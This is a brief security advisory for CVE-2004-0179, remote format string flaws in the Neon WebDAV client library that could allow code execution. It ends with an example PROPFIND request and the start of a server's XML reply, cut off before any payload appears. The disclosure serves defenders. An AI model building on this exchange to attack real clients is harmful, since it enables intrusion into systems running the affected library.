Neon WebDAV Client Library 0.2x - Format String

Related Vulnerabilities: CVE-2004-0179  
Publish Date: 14 Apr 2004
Author: Thomas Wana


It has been reported that the Neon client library is prone to multiple remote format string vulnerabilities. This issue is due to a failure of the application to properly implement format string functions.

Ultimately this vulnerability could allow for execution of arbitrary code on the system implementing the affected client software, which would occur in the security context of the server process.

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PROPFIND /example/resource/string/ HTTP/1.1
Pragma: no-cache
Cache-control: no-cache
Accept: text/*, image/jpeg, image/png, image/*, */*
Accept-Encoding: x-gzip, gzip, identity
Accept-Charset: iso-8859-1, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Depth: 0

- --------

HTTP/1.1 207 Multi-Status
X-Cocoon-Version: 2.1
Set-Cookie: JSESSIONID=cookie_data; Path=/example
Content-Type: text/xml
Transfer-Encoding: chunked

<?xml version="1.0" encoding="UTF-8"?>
<D:multistatus xmlns:D="DAV:">

<D:response xmlns:lp1="DAV:" xmlns:lp2="">
